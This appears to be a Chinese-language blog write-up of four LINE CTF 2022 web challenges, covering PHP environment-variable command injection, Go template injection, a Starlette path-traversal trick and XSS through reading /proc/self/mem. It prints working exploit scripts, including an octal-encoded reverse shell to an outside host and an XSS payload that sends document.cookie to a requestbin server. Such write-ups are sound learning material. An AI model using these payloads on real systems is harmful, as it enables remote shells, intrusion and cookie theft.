LINECTF2022wp

好像还不是很坐牢。所以这篇能叫wp

全程看tkmk神仙疯狂输出，我在旁边打杂学习

四个简单一点的题都出了，然后一两个解的几个题没心情看呜呜
说到最后还是只会做简单题的垃圾呜呜

bb

又见p神文章题
这次直接给了bash，但是不给字母了。然后还是一样的命令执行

<?php
error_reporting(0);

function bye($s, $ptn)
{
    if (preg_match($ptn, $s)) {
        return false;
    }
    return true;
}

foreach ($_GET["env"] as $k => $v) {
    if (bye($k, "/=/i") && bye($v, "/[a-zA-Z]/i")) {
        putenv("{$k}={$v}");
    }
}
system("bash -c 'imdude'");

foreach ($_GET["env"] as $k => $v) {
    if (bye($k, "/=/i")) {
        putenv("{$k}");
    }
}
highlight_file(__FILE__);
?>

putenv不加等号的话表示unset掉这个变量。不过本身一次处理结束那个变量也就没了，好像也没必要多做操作

不给用字母第一反应8进制，但实际上打了半天打不通。。。本地远程试八进制都没成功，tkmk神仙倒是说他用这个形式$'\000'一打就通了
我暂且蒙在鼓里

然后厚着脸皮去问了一下。payload大抵是这个模式，还说可以在man里面搜到，Letmetrytry

发现为什么当初觉得打不通了。。。因为当时本地测试用PHP的getenv函数获取环境变量的值，并不会被解析。所以以为没有解析，实际上直接用system去获取一下就能发现是解析了的，以及没有回显，要靠touch一个东西之类的来打。。。

BASH_ENV可以直接打通，BASH_FUNC打半天没反应
以及发现了一个奇怪的事情，直接\000这种八进制echo出来也被解析成了字符串，但是只有$'\000'这种套了$和引号的形式能被正确解析执行命令

这个语法在man里面搜oct会更容易找到

Words of the form $’string’ are treated specially. The word expands to string, with backslash-escaped characters replaced as specified by the ANSI C standard. Backslash escape sequences, if present, are decoded as follows:
\nnn the eight-bit character whose value is the octal value nnn (one to three octal digits)
\xHH the eight-bit character whose value is the hexadecimal value HH (one or two hex digits)

写了个破烂

import re

payload = "bash -i >& /dev/tcp/www.z3ratu1.cn/10001 0>&1"
result = ""
for c in payload:
    if re.match("[a-zA-Z]", c):
        result += "$'\\" + str(oct(ord(c)))[2:].rjust(3, '0') + "'"
    else:
        result += c
print("$(" + result + ")")

还有一个怪怪的地方，我把所有字符都八进制之后反而打不通了？只把字母八进制才打得通，怪诶

LINECTF{well..what_do_you_think_about}

gotm

用go写的一个奇怪的东西，go本身就看不太懂。。。本来以为是打go的jwt，还搜到了一个似乎符合版本的洞。但看了下洞的描述感觉和当前情况不太对的上。最后发现有一个裸的模板注入（我一开始还好奇为什么jwt secret要存在用户账户里面，原来是给go的低危害模板注入泄露）

func root_handler(w http.ResponseWriter, r *http.Request) {
    token := r.Header.Get("X-Token")
    if token != "" {
        id, _ := jwt_decode(token)
        acc := get_account(id)
        tpl, err := template.New("").Parse("Logged in as " + acc.id)
        if err != nil {
        }
        tpl.Execute(w, &acc)
    } else {

        return
    }
}

以及这里其实已经直接字符串拼接了，也没必要再怎么渲染一下，简单来说就是非常垃圾的垃圾代码，直接模板注入获取secret伪造jwt

一开始用{{.pw}}却搞不出来，后来直接{{. }}获取全部属性就有了。。。

Memo Drive

没看，还没上号就被秒了
然后看了tkmk的一句话秒杀原理也没看懂。然后赛后找了下wp才发现并没有那么简单，需要对源码进行阅读才能理解其中原理

有用的代码就这么点，这回用的不是经典flask，而是一个小众一点的Starlette

def view(request):
    context = {}

    try:
        context['request'] = request
        clientId = getClientID(request.client.host)

        if '&' in request.url.query or '.' in request.url.query or '.' in unquote(request.query_params[clientId]):
            raise
        
        filename = request.query_params[clientId]
        path = './memo/' + "".join(request.query_params.keys()) + '/' + filename
        
        f = open(path, 'r')
        contents = f.readlines()
        f.close()
        
        context['filename'] = filename
        context['contents'] = contents
    
    except:
        pass
    
    return templates.TemplateResponse('/view/view.html', context)

然后绕过那个query和queryparam的操作就略微的玄幻了。一个是用;代替&分隔，会成功的在query_params中获取到两个值，另一个是在HTTP header的host字段加一个#，这样子request.query里就没有内容了。。

这么说是非常玄幻的，具体需要看源码的实现

我直接链接别人的文章
https://github.com/aszx87410/huli-blog/blob/master/source/_posts/linectf-2022-writeup.md

井号那个操作是因为url是这么个拼起来的
url = f"{scheme}://{host_header}{path}"
然后再解析url.query的时候是基于这个url解析的，直接#后面全部被当做hash。而query_params又不属于url，结果就额外另作解析，又能正常通过

Online library

代码怪得一笔，一开始看了个奇怪的地方看了半天。感觉那个地方就是攻击点，后来感觉就是绕不过去，然后看了个奇怪的地方感觉有奇怪的打法但是不会，写到Polaris里面后tkmk神仙秒了

xss题。一共有两个xss点

第一个要post，但cookie是无属性的，也就是前两分钟支持跨域post。但是这里又先把cookie覆盖掉了。当时猜测可能有什么同步异步操作能在这个脚本执行之前先把flag发出来

app.post("/insert", (req: Express.Request, res: Express.Response): void => {
    if (
        typeof req.body.title === "string" &&
        req.body.title.length < 30 &&
        typeof req.body.content === "string" &&
        req.body.content.length < 1024 * 256
    ) {
        res.end(`<script>document.cookie = 'FLAG=REMOVED'</script><h1>${req.body.title}</h1><hr/>` + req.body.content);
    } else {
        res.end("Something wrong with your book title or contents.");
    }
});

bot代码

(async (): Promise<void> => {
    while (true) {
        const [error, data]: Array<string> = await redis.blpop("query", 0)
        if (data && data.startsWith("/") && Url.parse("http://web" + data).host === "web") {
            console.log("> Start to process - http://web" + data)
            await(
                async (url: string): Promise<void> => {
                const bot: Puppeteer.Browser = await Puppeteer.launch({
                    product: "chrome",
                    headless: true,
                    ignoreHTTPSErrors: true,
                    args: ["--no-sandbox"]
                })
                const page: Puppeteer.Page = await bot.newPage();
                await page.setCookie({
                    domain: "web",
                    name: "FLAG",
                    value: process.env.FLAG
                })
                await page.goto(url, {
                    timeout: 10000
                }).catch((error: Error): void => {
                    console.error(error)
                })
                await page.close()
                await bot.close()
            })("http://web" + data);
            console.log("> Job Done.")
        } else {
            console.error("> Invalid path.")
        }
    }
})();

那么问题就是怎么过这个data.startsWith("/") && Url.parse("http://web" + data).host === "web"玩意了

这里有一个点很怪，为什么要强制限定data.startsWith(“/“)，按理说直接在前面拼的web后面加上斜杠就行了。感觉很可疑，然后试了半天Unicode之类的东西

然后发现startsWith显然过不了，那么有没有可能开头是一个斜杠还能让他host解析成web但实际访问的时候不是呢。

又试了半天，不会。。。

然后开始看另一个xss点

app.get("/:t/:s/:e", (req: Express.Request, res: Express.Response): void => {
    const s: number = Number(req.params.s)
    const e: number = Number(req.params.e)
    const t: string = req.params.t

    if ((/[\x00-\x1f]|\x7f|\<|\>/).test(t)) {
        res.end("Invalid character in book title.")
    } else  {
        Fs.stat(`public/${t}`, (err: NodeJS.ErrnoException, stats: Fs.Stats): void => {
            if (err) {
                res.end("No such a book in bookself.")
            } else {
                if (s !== NaN && e !== NaN && s < e) {
                    if ((e - s) > (1024 * 256)) {
                        res.end("Too large to read.")
                    } else {
                        Fs.open(`public/${t}`, "r", (err: NodeJS.ErrnoException, fd: any): void => {
                            if (err || typeof fd !== "number") {
                                res.end("Invalid argument.")
                            } else {
                                let buf: Buffer = Buffer.alloc(e - s);
                                Fs.read(fd, buf, 0, (e - s), s, (err: NodeJS.ErrnoException, bytesRead: number, buf: Buffer): void => {
                                    res.end(`<h1>${t}</h1><hr/>` + buf.toString("utf-8"))
                                })
                            }
                        })
                    }
                } else {
                    res.end("There isn't size of book.")
                }
            }
        })
    }
});

title那可控不能xss，剩下的就是一个选择offset+length的读取，并且文件必须存在。简单试了一下可以目录穿越。开始读proc

读啊读啊读啊，不会读。读什么cmdline之类的东西都没什么用，题目的源码里面也没有什么能操作的地方

然后看到这段代码

app.post("/identify", (req: Express.Request, res: Express.Response): void => {
    res.set("Content-Type", "application/json");
    if (!req.session.username) {
        if (typeof req.body.username === "string" && req.body.username.length < 100) {
            req.session.username = req.body.username
            total.push(req.body.username)
            res.json({
                error: false,
                message: "Identified successfully."
            })
        } else {
            res.json({
                error: true,
                message: "Username is invalid or too long."
            })
        }
    } else {
        res.json({
            error: true,
            message: "You are already identified as " + req.session.username
        })
    }
});

这里的total是一个全局变量，感觉会在内存里面常驻，然后通过读/proc/self/maps读内存布局，再读mem，一开始不会这个东西，直接读的mem，读不出东西

然后就被tkmk神仙秒了tqltql

第二题起来复现，顺便问了下枢子哥maps文件的意义

00400000-04899000 r-xp 00000000 08:01 545155                             /usr/local/bin/node
04a99000-04a9c000 r--p 04499000 08:01 545155                             /usr/local/bin/node
04a9c000-04ab4000 rw-p 0449c000 08:01 545155                             /usr/local/bin/node
04ab4000-04ad5000 rw-p 00000000 00:00 0 
053d6000-0631d000 rw-p 00000000 00:00 0                                  [heap]
1eeb580000-1eeb5c0000 rw-p 00000000 00:00 0 
1024e680000-1024e6c0000 rw-p 00000000 00:00 0 
12654840000-12654880000 ---p 00000000 00:00 0 
15b65f40000-15b65f80000 rw-p 00000000 00:00 0 
18a12480000-18a124c0000 ---p 00000000 00:00 0 
1c64e2c0000-1c64e300000 ---p 00000000 00:00 0 
1d3c5dc0000-1d3c5e00000 rw-p 00000000 00:00 0 
1eac5b80000-1eac5bc0000 rw-p 00000000 00:00 0 
2f64ce80000-2f64cec0000 ---p 00000000 00:00 0 
317d9d00000-317d9d40000 ---p 00000000 00:00 0 
5088eb00000-5088eb40000 rw-p 00000000 00:00 0 
563aeb00000-563aeb40000 ---p 00000000 00:00 0 
5b7b9dc0000-5b7b9e00000 ---p 00000000

一般来说是会有一下so之类的动态链接库的装载地址的，就是代码段之类的，但是这里就一个node二进制，那就再说了。然后后面写着[heap]的这段地址就是堆地址。尝试从堆地址中获取变量

写了个垃圾脚本硬爆（这里有一个坑，re.match是从头匹配的。。。要用re.search，我被坑了好久。。。）

import re
import requests

maps = "http://35.243.100.112/..%2f..%2f..%2f..%2f..%2fproc%2fself%2fmaps/300/400"
res = requests.get(maps)
# print(res.text)
groups = re.search(r"0([a-f0-9]+?)-0([a-f0-9]+?) rw-p 00000000 00:00 0\s+\[heap]", res.text)
start = int("0x"+groups.group(1), 16)
end = int("0x"+groups.group(2), 16)
print("[+]start: {}".format(start))
print("[+]end: {}".format(end))
step = 1024 * 128


url = "http://35.243.100.112/..%2f..%2f..%2f..%2f..%2fproc%2fself%2fmem/{}/{}"
payload = "<script>fetch('https://requestbin.z3ratu1.cn?'+document.cookie);</script>"
headers = {"Content-Type": "application/x-www-form-urlencoded"}
data = "username="+payload
for i in range(10):
    identify = "http://35.243.100.112/identify"
    requests.post(identify, headers=headers, data=data)

prefix = "<h1>../../../../../proc/self/mem</h1><hr/>"

while start < end:
    res = requests.get(url.format(start, start+step))
    index = res.text.find(payload)
    if index != -1:
        print("[+]found: "+url.format(start, start+step))
        # break
    start += step
    print("{}, remaining {}".format(start, end-start))

感觉搜出来的总是http请求，而不是那个变量，以及http请求那里总是变，所以补水很稳定，后来把break注释掉之后找到了后面的几个出现的点，可能就是变量位置了？然后提交给bot打通

说起来是一个不怎么web的题，不过稍微学一点内存之类的东西也不会有坏处

FLAG=LINECTF{705db4df0537ed5e7f8b6a2044c4b5839f4ebfa4}